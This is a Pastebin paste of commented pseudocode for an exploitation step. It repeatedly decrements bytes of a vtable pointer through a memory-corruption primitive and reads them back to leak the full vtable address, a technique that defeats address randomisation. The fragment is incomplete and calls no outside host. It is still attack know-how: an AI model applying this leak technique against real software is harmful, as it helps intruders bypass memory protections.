Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- vtable = ReadMem();
- old_fst_byte = vtable[0];
- old_snd_byte = vtable[1];
- old_trd_byte = vtable[2];
- old_frt_byte = vtable[3];
- // This "dec" decrements on the offset of the vtable where the
- second byte is
- dec(vtable[1]);
- vtable = ReadMem();
- // Check if we actually dec the second byte
- if (vtable[1] != old_snd_byte){
- // If vtable[1] is different than the old_snd_byte, it
- means that we decremented the real second byte
- // Else vtable[1] would be the next readeable byte (<0x7f)
- snd_byte = old_snd_byte;
- }
- else{
- // We didn't actually read the second byte, this means
- it's value is
- // greater than 7f, so we dec 7e to the value and then
- read the
- // final value and add the difference.
- // We did a dec already, so count starts on 1
- count = 1;
- for(l=0;l<0x3f;l++)
- {
- dec(vtable[1]);
- count++;
- }
- vtable = ReadMem();
- snd_byte = vtable[1] + count*2;
- }
- // We will do the exactly same thing for the third and fourth
- byte.
- // And of course we will check with the corresponding old_byte
- // And then of course we calculate the desired vtable <span class="moz-smiley-s1" title=":)"></span>
- leaked_vtable = (old_fst_byte << 24) | (snd_byte << 16) |
- (trd_byte << 8) | frt_byte;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
